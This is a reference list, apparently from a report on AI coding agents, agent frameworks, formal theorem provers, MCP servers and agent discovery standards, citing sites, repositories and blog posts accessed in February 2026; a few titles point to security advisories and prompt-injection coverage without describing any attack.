Open Interpreter. https://github.com/openinterpreter/open-interpreter. Accessed: 2026-02-06.
Leon: open-source personal assistant. https://getleon.ai/. Accessed: 2026-02-06.
Ollama. https://ollama.com/. Accessed: 2026-02-05.
Tailscale. https://tailscale.com/. Accessed: 2026-02-05.
Lean documentation. https://lean-lang.org/learn/. Accessed: 2026-02-05.
Coq. https://coq.inria.fr/. Accessed: 2026-02-05.
Isabelle. https://isabelle.in.tum.de/. Accessed: 2026-02-05.
Li, Z., Tian, H., Luo, L., Cao, Y., & Luo, P. (2026). DeepRead: Structure-aware multi-turn document reasoning. arXiv preprint arXiv:2602.05014. https://arxiv.org/abs/2602.05014. Accessed: 2026-02-08.
Google DeepMind. AlphaProof: AI solves IMO problems at silver medal level. https://deepmind.google/blog/ai-solves-imo-problems-at-silver-medal-level/. Accessed: 2026-02-13.
Google DeepMind. AlphaEvolve: A Gemini-powered coding agent for designing advanced algorithms. https://deepmind.google/blog/alphaevolve-a-gemini-powered-coding-agent-for-designing-advanced-algorithms/. Accessed: 2026-02-13.
Google DeepMind. Aletheia. https://github.com/google-deepmind/superhuman/tree/main/aletheia. Accessed: 2026-02-13.
Google DeepMind. AI for Math Initiative. https://blog.google/technology/google-deepmind/ai-for-math/. Accessed: 2026-02-13.
Google DeepMind. AlphaGeometry. https://github.com/google-deepmind/alphageometry. Accessed: 2026-02-13.
Axiom Math. AxiomProver: Putnam 2025 solutions. https://github.com/AxiomMath/putnam2025. Accessed: 2026-02-13.
Axiom Math. https://axiommath.ai/. Accessed: 2026-02-13.
Harmonic. https://harmonic.fun/. Accessed: 2026-02-13.
Goedel-Prover-V2. https://github.com/Goedel-LM/Goedel-Prover-V2. Accessed: 2026-02-13.
DeepSeek-Prover-V2. https://github.com/deepseek-ai/DeepSeek-Prover-V2. Accessed: 2026-02-13.
Numina-Lean-Agent. https://github.com/project-numina/numina-lean-agent. Accessed: 2026-02-13.
PhysProver: Formal theorem proving for physics. arXiv preprint arXiv:2501.14275. https://arxiv.org/abs/2501.14275. Accessed: 2026-02-13.
ai.viXra.org: AI-assisted scholarly articles. https://ai.vixra.org/. Accessed: 2026-02-13.
clawXiv.org: Preprint server for AI agents. https://www.clawxiv.org/. Accessed: 2026-02-13.
The Infinite Backrooms. https://www.infinitebackrooms.com/. Accessed: 2026-02-13.
Jesse Thaler. “Centaur Science: Adventures in AI+Physics.” CERN Colloquium, 4 February 2026. https://indico.cern.ch/event/1642790/. Accessed: 2026-02-13.
Matchlock: microVM sandbox for agent execution. https://github.com/jingkaihe/matchlock. Accessed: 2026-02-13.
Microsandbox. https://github.com/zerocore-ai/microsandbox. Accessed: 2026-02-13.
OpenAI. Introducing GPT-5.3-Codex-Spark. https://openai.com/index/introducing-gpt-5-3-codex-spark/. Accessed: 2026-02-13.
Cerebras. Introducing OpenAI GPT-5.3-Codex-Spark Powered by Cerebras. https://www.cerebras.ai/blog/openai-codexspark. Accessed: 2026-02-13.
Apple. Xcode 26.3 unlocks the power of agentic coding. https://www.apple.com/newsroom/2026/02/xcode-26-point-3-unlocks-the-power-of-agentic-coding/. Accessed: 2026-02-13.
GitHub. Agent HQ: Claude and Codex now available in public preview on GitHub. https://github.blog/changelog/2026-02-04-claude-and-codex-are-now-available-in-public-preview-on-github/. Accessed: 2026-02-13.
Agent Trace specification. https://agent-trace.dev/. Accessed: 2026-02-13.
Agent Trace GitHub repository. https://github.com/cursor/agent-trace. Accessed: 2026-02-13.
OWASP MCP Top 10. https://owasp.org/www-project-mcp-top-10/. Accessed: 2026-02-13.
OWASP Top 10 for Agentic Applications (2026). https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/. Accessed: 2026-02-13.
VirusTotal. From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized. https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html. Accessed: 2026-02-13.
Cognition. Agent Trace: Capturing the Context Graph of Code. https://cognition.ai/blog/agent-trace. Accessed: 2026-02-13.
Snowflake. Cortex Code: Snowflake-native AI coding agent. https://www.snowflake.com/en/product/features/cortex-code/. Accessed: 2026-02-13.
GitHub Copilot Memory documentation. https://docs.github.com/copilot/concepts/agents/copilot-memory. Accessed: 2026-02-13.
JFrog. Critical mcp-remote RCE Vulnerability (CVE-2025-6514). https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/. Accessed: 2026-02-13.
Cyata / The Register. Anthropic Git MCP Server Flaws (CVE-2025-68145/68143/68144). https://www.theregister.com/2026/01/20/anthropic_prompt_injection_flaws/. Accessed: 2026-02-13.
Gemini CLI repository. https://github.com/google-gemini/gemini-cli. Accessed: 2026-02-13.
Gemini CLI documentation. https://geminicli.com/docs/. Accessed: 2026-02-13.
Gemini CLI subagents. https://geminicli.com/docs/core/subagents/. Accessed: 2026-02-13.
Gemini CLI Agent Skills. https://geminicli.com/docs/cli/skills/. Accessed: 2026-02-13.
Claude Agent SDK overview. https://platform.claude.com/docs/en/agent-sdk/overview. Accessed: 2026-02-13.
Claude Code subagents documentation. https://docs.anthropic.com/en/docs/claude-code/sub-agents. Accessed: 2026-02-13.
Anthropic. Tool Search Tool. https://platform.claude.com/docs/en/agents-and-tools/tool-use/tool-search-tool. Accessed: 2026-02-13.
Anthropic. Programmatic Tool Calling. https://platform.claude.com/docs/en/agents-and-tools/tool-use/programmatic-tool-calling. Accessed: 2026-02-13.
Anthropic. Claude Opus 4.6 announcement. https://www.anthropic.com/news/claude-opus-4-6. Accessed: 2026-02-13.
Anthropic. Building a C compiler with Agent Teams. https://www.anthropic.com/engineering/building-c-compiler. Accessed: 2026-02-13.
OpenAI Codex CLI repository. https://github.com/openai/codex. Accessed: 2026-02-13.
OpenAI Codex security documentation. https://developers.openai.com/codex/security/. Accessed: 2026-02-13.
OpenAI. Introducing AgentKit. https://openai.com/index/introducing-agentkit/. Accessed: 2026-02-13.
OpenAI. Introducing OpenAI Frontier. https://openai.com/index/introducing-openai-frontier/. Accessed: 2026-02-13.
OpenAI. Migrate from Assistants API to Responses API. https://platform.openai.com/docs/guides/migrate-to-responses. Accessed: 2026-02-13.
Vertex AI Agent Builder overview. https://docs.cloud.google.com/agent-builder/overview. Accessed: 2026-02-13.
Google ADK with A2A protocol. https://google.github.io/adk-docs/a2a/. Accessed: 2026-02-13.
Google. Enhanced tool governance in Vertex AI Agent Builder. https://cloud.google.com/blog/products/ai-machine-learning/new-enhanced-tool-governance-in-vertex-ai-agent-builder. Accessed: 2026-02-13.
Agentic AI Foundation (AAIF). https://www.linuxfoundation.org/press/agentic-ai-foundation. Accessed: 2026-02-13.
Anthropic. Cowork desktop preview. https://www.anthropic.com/news/cowork. Accessed: 2026-02-13.
llms.txt specification. https://llmstxt.org/. Accessed: 2026-02-13.
MCP Registry. https://registry.modelcontextprotocol.io/. Accessed: 2026-02-13.
MCP Registry GitHub repository. https://github.com/modelcontextprotocol/registry. Accessed: 2026-02-13.
MCP reference servers repository. https://github.com/modelcontextprotocol/servers. Accessed: 2026-02-13.
MCP SEP-1960: .well-known/mcp discovery endpoint. https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1960. Accessed: 2026-02-13.
MCP SEP-1649: MCP Server Cards. https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1649. Accessed: 2026-02-13.
MCP ext-apps: MCP Apps extension. https://github.com/modelcontextprotocol/ext-apps. Accessed: 2026-02-13.
A2A protocol: Agent discovery. https://a2a-protocol.org/latest/topics/agent-discovery/. Accessed: 2026-02-13.
Lightweight Agent Standards Working Group (LAS-WG). agent-permissions.json. https://github.com/las-wg/agent-permissions.json. Accessed: 2026-02-13.
Spawning. ai.txt: A new way for websites to set AI permissions. https://spawning.substack.com/p/aitxt-a-new-way-for-websites-to-set. Accessed: 2026-02-13.
Anthropic Agent Skills GitHub repository. https://github.com/anthropics/skills. Accessed: 2026-02-13.
OpenAI Agent Skills. https://github.com/openai/skills. Accessed: 2026-02-13.
VoltAgent/awesome-agent-skills. https://github.com/VoltAgent/awesome-agent-skills. Accessed: 2026-02-13.
punkpeye/awesome-mcp-servers. https://github.com/punkpeye/awesome-mcp-servers. Accessed: 2026-02-13.
SkillRegistry.io. https://skillregistry.io/. Accessed: 2026-02-13.
PulseMCP: MCP server directory. https://www.pulsemcp.com/servers. Accessed: 2026-02-13.
Playwright MCP server. https://github.com/microsoft/playwright-mcp. Accessed: 2026-02-13.
Notion MCP server documentation. https://developers.notion.com/docs/mcp. Accessed: 2026-02-13.
Stripe MCP server documentation. https://docs.stripe.com/mcp. Accessed: 2026-02-13.
Slack MCP server documentation. https://docs.slack.dev/ai/mcp-server/. Accessed: 2026-02-13.
Datadog MCP server documentation. https://docs.datadoghq.com/bits_ai/mcp_server/. Accessed: 2026-02-13.
Grafana MCP server. https://github.com/grafana/mcp-grafana. Accessed: 2026-02-13.
Hugging Face MCP server. https://github.com/huggingface/hf-mcp-server. Accessed: 2026-02-13.